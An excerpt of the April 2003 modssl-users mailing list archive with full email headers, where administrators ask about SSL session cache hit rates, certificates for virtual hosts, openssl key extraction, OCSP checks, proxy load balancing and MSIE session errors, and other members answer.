	id CC4272AA02E; Thu, 10 Apr 2003 01:02:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR001.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id A41392AA01F
	for ; Thu, 10 Apr 2003 01:02:26 +0200 (CEST)
Received: from steerpike.geoffthorpe.net ([24.202.231.211])
 by VL-MS-MR001.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0HD30022OMOJPV@VL-MS-MR001.sc1.videotron.ca> for
 modssl-users@modssl.org; Wed, 09 Apr 2003 19:02:43 -0400 (EDT)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Wed,
 09 Apr 2003 19:02:24 -0400
Date: Wed, 09 Apr 2003 19:02:24 -0400
From: Geoff Thorpe 
Subject: Re: Need to know hit rate of ssl session cache
In-reply-to: <20030409134341.GC15657@toftum.dk>
To: modssl-users@modssl.org
Message-id: <20030409230224.GB1931@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4.1i
X-Editor: Vim http://www.vim.org/
References: <60F1F87A64834D45A1EBAE9618305FB8025244E2@qeo00200>
 <20030409134341.GC15657@toftum.dk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

* Mads Toftum (mads@toftum.dk) wrote:
> On Wed, Apr 09, 2003 at 03:37:10PM +0200, Courtin, Bert wrote:
> > Hi list,
> > 
> > maybe this has already discussed elswhere but I didn't find appropriate information...
> > 
> > What I need to know is the "hit rate" of the ssl session cache respectively a way to calculate it myself based on information from the ssl*.log files, if possible.
> > 
> You should raise SSLLogLevel to get that info - iirc you need either 
> debug or trace, but try it out - see
> http://www.modssl.org/docs/2.8/ssl_reference.html#ToC20

And the source code is pretty easy to hack if do-it-yourself is a valid
option. See ssl_scache.c, for example. If you want to go this way, add
some traces to the various cache functions to watch what happens when
you (a) negotiate a new session, (b) request a session resume after
restarting the server (ie. when the resume will fail), and (c) request a
session resume that succeeds. These functions defer to the corresponding
mode-specific functions (ie. shmcb, shmht, dbm, etc). You should watch
the return value (where appropriate) of calling into these.

As for logging, IIRC it will generate quite a bit of noise, but if that
overhead isn't an issue and it can give you what you need, then it's
probably the simplest way. Just wanted to mention that if you're
prepared to touch the source code you gain a lot of flexibility. Long
live open source, etc.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 14 10:03:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 84B3F2AA036; Mon, 14 Apr 2003 10:03:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sirtwebserver01.sirt.es (sirtwebserver01.sirt.es [194.179.85.253])
	by master.modssl.org (Postfix) with ESMTP id 267B92AA01F
	for ; Mon, 14 Apr 2003 10:03:12 +0200 (CEST)
Received: from maribeljordi (adsl2sirt [80.38.64.136])
	by sirtwebserver01.sirt.es (8.8.7/8.8.7) with ESMTP id JAA27071
	for ; Mon, 14 Apr 2003 09:56:50 +0200
Message-ID: <002701c3025c$f2b179f0$6501a8c0@local.sirt.es>
From: "Jordi" 
To: 
Subject: 
Date: Mon, 14 Apr 2003 10:07:21 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_001E_01C3026D.A36E6E00"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jordi" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_001E_01C3026D.A36E6E00
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


Hi=20

I have a linux box ( Red Hat 7.2 ) with apache 2.0.44, and  about 100 =
virtual hosts, and one of them works with https ( www.httpsdomain.com ).

All works fine, except for a little problem...if i try to access a non =
https domain via ssh ( https://nonhttpsdomain.com ) , i get the =
certificate for the https domain, and when i accept, i see the=20
website of the www.httpsdomain.com

How can i do to ignore or redirect the domains that work with http  when =
going https??
I think with the command Redirect i can do it...but i have to create an =
entry for every domain in the ssl.conf...and i think that thats not the =
best solution.

thanks, and sorry for my english

------=_NextPart_000_001E_01C3026D.A36E6E00
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









 


Hi 


 


I have a linux box ( Red Hat 7.2 ) with =
apache=20
2.0.44, and  about 100 virtual hosts, and one of them works =
with https=20
( www.httpsdomain.com ).


 


All works fine, except for a little =
problem...if i=20
try to access a non https domain via ssh ( https://nonhttpsdomain.com ) , i =
get the=20
certificate for the https domain, and when i accept, i see the =



website of the www.httpsdomain.com


 


How can i do to ignore or redirect the domains that work=20
with http  when going https??


I think with the command Redirect i can do it...but i have to =
create an=20
entry for every domain in the ssl.conf...and i think that thats not the =
best=20
solution.


thanks, and sorry for my english


------=_NextPart_000_001E_01C3026D.A36E6E00--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 14 10:41:38 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E27AE2AA036; Mon, 14 Apr 2003 10:41:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id B63652AA01F
	for ; Mon, 14 Apr 2003 10:41:34 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h3E8f3u04794
	for ; Mon, 14 Apr 2003 09:41:23 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <2STPR58X>; Mon, 14 Apr 2003 09:40:58 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F291A@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: 
Date: Mon, 14 Apr 2003 09:40:55 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I think you mean ssl not ssh. If it is the case that www.httpsdomain.com and
nonhttpsdomain.com have the same IP address (and it looks like they do),
this is a "feature" of SSL. The reasons why are all over the mail archive
and in the FAQ, http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47, so I'm
not repeating it here.

- 
John Airey, BSc (Jt Hons), CNA, RHCE 
Internet systems support officer, ITCSD, Royal National Institute of the
Blind, 
Bakewell Road, Peterborough PE2 6XU, 
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 
Taking the path of least resistance is what makes rivers and Men crooked. 
-----Original Message-----
From: Jordi [mailto:jordi@sirt.es]
Sent: 14 April 2003 09:07
To: modssl-users@modssl.org
Subject: 



Hi 

I have a linux box ( Red Hat 7.2 ) with apache 2.0.44, and  about 100
virtual hosts, and one of them works with https ( www.httpsdomain.com ).

All works fine, except for a little problem...if i try to access a non https
domain via ssh ( https://nonhttpsdomain.com ) , i get the certificate for
the https domain, and when i accept, i see the 
website of the www.httpsdomain.com

How can i do to ignore or redirect the domains that work with http  when
going https??
I think with the command Redirect i can do it...but i have to create an
entry for every domain in the ssl.conf...and i think that thats not the best
solution.

thanks, and sorry for my english

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 14 21:37:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 171EC2AA03C; Mon, 14 Apr 2003 21:37:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hermes.ulaval.ca (hermes.ulaval.ca [132.203.250.27])
	by master.modssl.org (Postfix) with ESMTP id 8499E2AA021
	for ; Mon, 14 Apr 2003 21:37:54 +0200 (CEST)
Received: from sitpro (sitpro.sit.ulaval.ca [132.203.150.170])
	by hermes.ulaval.ca (8.12.9/8.12.9) with ESMTP id h3EJbq16028555
	for ; Mon, 14 Apr 2003 15:37:52 -0400
From: "Pascal Rodrigue" 
To: 
Subject: Multiple SSL server certificate with vhosting
Date: Mon, 14 Apr 2003 15:37:53 -0400
Organization: Universite Laval
Message-ID: <001701c302bd$572b5d00$aa96cb84@sit.ulaval.ca>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0018_01C3029B.D019BD00"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4024
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pascal Rodrigue" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0018_01C3029B.D019BD00
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi,

=20

  I=92m using apache (Apache/1.3.19 (Win32) ) and mod_ssl =
(mod_ssl/2.8.1)
to provide security for web servers. We use one server for development
and we use multiple Virtual host on it. How can I use more than one
server certificate ? One for each different servername. I always got the
same certificate for each host and when the common name of the
certificate doesn=92t match the servername I got a confirm message. Any
help appreciated, thanx

=20

-------------------------------------------

Pascal Rodrigue

Analyste de l'informatique

Division de l'exploitation

Service de l'informatique et des t=E9l=E9communications

Pavillon Louis-Jacques-Casault, local 2410
Universit=E9 Laval, Qu=E9bec, Canada,  G1K 7P4
T=E9l.: 418-656-2131 poste 13137, Fax: 418-656-7305
  Pascal.Rodrigue@sit.ulaval.ca

=20

"La vie n'est pas que la somme des obstacle que l'on rencontre =E0 =
chaque
jour. La vie, la vraie, c'est la mani=E8re dont on les franchit!"

=20

Das Leben ist nicht nur die Summe des Hindernisses, da=DF man an jedem =
Tag
begegnet. Das Leben, das wahre, ist es die Art, von der man sie
=FCberquert!=20

=20


------=_NextPart_000_0018_01C3029B.D019BD00
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable



















Hi,



 



  I’m using apache =
(Apache/1.3.19
(Win32) ) and mod_ssl (mod_ssl/2.8.1) to provide security for web =
servers.
We use one server for development and we use multiple Virtual host on =
it. How can
I use more than one server certificate ? One for each different
servername. I always got the same certificate for each host and when the =
common
name of the certificate doesn’t match the servername I got a =
confirm
message. Any help appreciated, thanx



 



-------------------------=
------------------



Pascal =
Rodrigue



Analyste de =
l'informatique



Division de =
l'exploitation



Service de l'informatique et des
t=E9l=E9communications



Pavillon Louis-Jacques-Casault, local =
2410

Universit=E9 Laval, Qu=E9bec, Canada,  G1K 7P4

T=E9l.: 418-656-2131 poste 13137, Fax: 418-656-7305

Pascal.Rodrigue@sit.ulaval.ca



 



"La
vie n'est pas que la somme des obstacle que l'on rencontre =E0 chaque =
jour. La
vie, la vraie, c'est la mani=E8re dont on les =
franchit!"



 






Das
Leben ist nicht nur die Summe des Hindernisses, da=DF man an jedem Tag =
begegnet.
Das Leben, das wahre, ist es die Art, von der man sie =FCberquert! =







 









------=_NextPart_000_0018_01C3029B.D019BD00--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 14 21:44:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 936822AA03C; Mon, 14 Apr 2003 21:44:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 758462AA01F
	for ; Mon, 14 Apr 2003 21:44:01 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id AAB6D6E4187; Mon, 14 Apr 2003 21:43:55 +0200 (CEST)
Date: Mon, 14 Apr 2003 21:43:55 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Multiple SSL server certificate with vhosting
Message-ID: <20030414194355.GA6914@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <001701c302bd$572b5d00$aa96cb84@sit.ulaval.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <001701c302bd$572b5d00$aa96cb84@sit.ulaval.ca>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Apr 14, 2003 at 03:37:53PM -0400, Pascal Rodrigue wrote:
>   I’m using apache (Apache/1.3.19 (Win32) ) and mod_ssl (mod_ssl/2.8.1)
> to provide security for web servers. We use one server for development
> and we use multiple Virtual host on it. How can I use more than one
> server certificate ? One for each different servername. I always got the
> same certificate for each host and when the common name of the
> certificate doesn’t match the servername I got a confirm message. Any
> help appreciated, thanx
> 
This is a FAQ - see http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#vhosts2

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 14 21:44:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 21CDB2AA03C; Mon, 14 Apr 2003 21:44:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from celery.onware.ca (celery.onware.ca [142.179.205.152])
	by master.modssl.org (Postfix) with ESMTP id CF3952AA036
	for ; Mon, 14 Apr 2003 21:44:33 +0200 (CEST)
Received: by celery.onware.ca (Postfix, from userid 1001)
	id 85BFB3FAB5; Mon, 14 Apr 2003 13:45:27 -0600 (MDT)
Received: from localhost (localhost [127.0.0.1])
	by celery.onware.ca (Postfix) with ESMTP id 7CDD43FAA2
	for ; Mon, 14 Apr 2003 13:45:27 -0600 (MDT)
Date: Mon, 14 Apr 2003 13:45:27 -0600 (MDT)
From: Ian Moon 
To: modssl-users@modssl.org
Subject: Re: Multiple SSL server certificate with vhosting
In-Reply-To: <001701c302bd$572b5d00$aa96cb84@sit.ulaval.ca>
Message-ID: <20030414134136.T69411-100000@celery.onware.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ian Moon 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

To use different ssl certificates for each virtual host, you
must bind the virtual host to a different ip address.

There may be a better solution for using a wildcard certificate,
but I don't have any experience with those.


On Mon, 14 Apr 2003, Pascal Rodrigue wrote:

> Hi,
>
>
>
>   I=92m using apache (Apache/1.3.19 (Win32) ) and mod_ssl (mod_ssl/2.8.1)
> to provide security for web servers. We use one server for development
> and we use multiple Virtual host on it. How can I use more than one
> server certificate ? One for each different servername. I always got the
> same certificate for each host and when the common name of the
> certificate doesn=92t match the servername I got a confirm message. Any
> help appreciated, thanx
>
>
>
> -------------------------------------------
>
> Pascal Rodrigue
>
> Analyste de l'informatique
>
> Division de l'exploitation
>
> Service de l'informatique et des t=E9l=E9communications
>
> Pavillon Louis-Jacques-Casault, local 2410
> Universit=E9 Laval, Qu=E9bec, Canada,  G1K 7P4
> T=E9l.: 418-656-2131 poste 13137, Fax: 418-656-7305
>   Pascal.Rodrigue@sit.ulaval.ca
>
>
>
> "La vie n'est pas que la somme des obstacle que l'on rencontre =E0 chaque
> jour. La vie, la vraie, c'est la mani=E8re dont on les franchit!"
>
>
>
> Das Leben ist nicht nur die Summe des Hindernisses, da=DF man an jedem Ta=
g
> begegnet. Das Leben, das wahre, ist es die Art, von der man sie
> =FCberquert!
>
>
>
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 15 14:09:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4F2EF2AA036; Tue, 15 Apr 2003 14:09:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from euhemsmtp01.bp.com (euhemsmtp01.bp.com [62.189.94.209])
	by master.modssl.org (Postfix) with ESMTP id 402B72AA019
	for ; Tue, 15 Apr 2003 14:09:55 +0200 (CEST)
Received: from euhemav002.bp.com (inetgate21.bp.com [62.189.94.193])
	by euhemsmtp01.bp.com (Switch-3.0.3/Switch-3.0.0) with SMTP id h3FCD6TF022468
	for ; Tue, 15 Apr 2003 13:13:06 +0100 (BST)
Received: by EUHEMX1 with Internet Mail Service (5.5.2653.19)
	id <26JDD12N>; Tue, 15 Apr 2003 13:08:53 +0100
Message-ID: <2FE5DE0B8790D411832700508BAF485906D7B980@eumorx5.bp.com>
From: "Witham, Darren (Contractor)" 
To: modssl-users@modssl.org
Subject: Key and Cert extraction
Date: Tue, 15 Apr 2003 13:08:49 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Witham, Darren (Contractor)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Hi,

  I posted a beginners question to this list a while back enquiring how to
extract a key and cert from a cert.der file

  i.e openssl pkcs12 -in cert.der -nodes -out certAndKey.pem

  That was fine for me and I was able to get by using the certAndKey.pem in
the end.

  I now actually need to extract the key and cert from certAndKey.pem. I
think I am getting the key by issuing the following

   openssl rsa  newkey.pem

  Is that is the correct way to extract the key ? I also need to extract the
cert as well but cannot work out which openssl command to use ? Basically I
am just issuing commands but don't have a clue what I am getting !!

Thx

Darren
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 16 19:55:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 69B882AA032; Wed, 16 Apr 2003 19:55:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nyslrs.osc.state.ny.us (smtp-lrs.osc.state.ny.us [204.80.56.9])
	by master.modssl.org (Postfix) with ESMTP id 4FD662AA01F
	for ; Wed, 16 Apr 2003 19:55:32 +0200 (CEST)
Subject: problem with sticky sessions.
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.9a  January 7, 2002
Message-ID: 
From: msagar@osc.state.ny.us
Date: Wed, 16 Apr 2003 13:56:27 -0400
X-MIMETrack: Serialize by Router on SMTP/IRM/NYSLRS(Release 5.0.9a |January 7, 2002) at
 04/16/2003 01:55:32 PM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: msagar@osc.state.ny.us
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I have apache set up using mod-ssl and proxy.  We are also attempting to
load balance our traffic with a cisco CSM.  We are having issues with the
sessions remaining "sticky".  The traffic seems to always route to one
webserver never balancing any traffic.  We see the proxy handing its own IP
to the CSM.  We believe we can get the CSM to balance if we can get the
proxy to pass the clients IP not its own.

My question is can and how do I set up apache to pass the IP of the client
PC making the request.

Thanks to all in advance any help is greatly appreciated.
Mark


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 17 00:37:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 883AC2AA039; Thu, 17 Apr 2003 00:37:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR001.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 02F312AA019
	for ; Thu, 17 Apr 2003 00:37:54 +0200 (CEST)
Received: from steerpike.geoffthorpe.net ([24.202.231.211])
 by VL-MS-MR001.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0HDG00999K7K38@VL-MS-MR001.sc1.videotron.ca> for
 modssl-users@modssl.org; Wed, 16 Apr 2003 18:38:09 -0400 (EDT)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Wed,
 16 Apr 2003 18:37:49 -0400
Date: Wed, 16 Apr 2003 18:37:49 -0400
From: Geoff Thorpe 
Subject: Re: problem with sticky sessions.
In-reply-to:
 
To: modssl-users@modssl.org
Cc: msagar@osc.state.ny.us
Message-id: <20030416223749.GC1905@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4.1i
X-Editor: Vim http://www.vim.org/
References:
 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

* msagar@osc.state.ny.us (msagar@osc.state.ny.us) wrote:
> I have apache set up using mod-ssl and proxy.  We are also attempting to
> load balance our traffic with a cisco CSM.  We are having issues with the
> sessions remaining "sticky".  The traffic seems to always route to one
> webserver never balancing any traffic.  We see the proxy handing its own IP
> to the CSM.  We believe we can get the CSM to balance if we can get the
> proxy to pass the clients IP not its own.

I can't help you with cisco products. However (if you can forgive the
shameless plug) sharing a session cache between your webservers will
allow you to ignore "sticky" caching and load-balance on more useful
heuristics (eg. balancing according to *load*). One such tool is at
www.distcache.org. If you want more background info on the thinking,
approach, issues, [etc.] - contact me off-list and I'll help as/where
possible.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 17 09:48:50 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3063B2AA039; Thu, 17 Apr 2003 09:48:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns.eer.ee (ns.eer.ee [195.80.103.28])
	by master.modssl.org (Postfix) with ESMTP id 578102AA019
	for ; Thu, 17 Apr 2003 09:48:48 +0200 (CEST)
Received: from fw.eer.ee (dmz.eer.ee [195.80.103.25])
	by ns.eer.ee (8.10.0/8.8.7) with SMTP id h3H7miF00583
	for ; Thu, 17 Apr 2003 05:48:44 -0200
Received: Stripped by FW-1
Received: Stripped by FW-1
Message-ID: <000f01c304b5$da262330$021064ac@erkik>
From: "Erki Kriks" 
To: 
References: 
Subject: ocsp
Date: Thu, 17 Apr 2003 10:49:18 +0300
MIME-Version: 1.0
Content-Type: text/plain; 	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Erki Kriks" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello!

Can anyone give example, how to use openSSL and ocsp to check certificate.
Certificate i want to give to ocsp in variable (not in file).

here is an example, how to use it if user certificate is in
file(UserCert.cer):
openssl.exe ocsp -issuer id.pem -cert UserCert.cer http://ocsp_addr -VAfile
id-ocsp.pem

but i want to use that certificate is given in variable?

Thanx,
Erki

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 23 20:08:55 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 86C0D2AA026; Wed, 23 Apr 2003 20:08:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from foundationcomputing.net (donorport.org [207.160.174.56])
	by master.modssl.org (Postfix) with ESMTP id 0F6762AA015
	for ; Wed, 23 Apr 2003 20:08:50 +0200 (CEST)
Received: from [207.160.174.20] (HELO foundationcomputing.com)
  by foundationcomputing.net (CommuniGate Pro SMTP 3.5.8)
  with ESMTP id 3462709 for modssl-users@modssl.org; Wed, 23 Apr 2003 12:08:20 -0600
Date: Wed, 23 Apr 2003 13:08:49 -0500
Mime-Version: 1.0 (Apple Message framework v552)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Subject: SSLSessionCache and MSIE "Page Not Found" problems
From: Derrick Fogle 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
Message-Id: 
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Derrick Fogle 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello list,

I'm having a problem with Apache/mod-ssl that I'm unable to figure out. 
An unreasonably high number of users trying to access the site with 
Win/MSIE get "Page Not Found" errors. When we look in the logs, what I 
see is subsequent SSL connections after the initial session 
establishment failing. The user can click their "Back" button, try the 
form submit again, and the server will eventually give up, issue the 
user a new SSL session, and the user's action will take. Then the next 
form submit, the problem starts again. It is usually people behind 
firewalls that have the problem, and any one given user will either not 
have the problem at all, or tend to have lots of problems with it.

My boss is on me about this, I'm more or less a newbie/dabbler, and my 
Linux server admin guy says he's looked into the problem and can't come 
up with a reason why or a resolution. But these users can go to other 
secure sites and not have the problem.

I need help, and I'm willing to pay to have the problem fixed. Please 
advise on where to go from here.

Thanks,

-Derrick Fogle
-Technology Coordinator
-MO Lions Eye Research Foundation
-404 Portland St, Columbia MO 65201
-573-443-1471

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 23 20:33:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 454372AA026; Wed, 23 Apr 2003 20:33:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
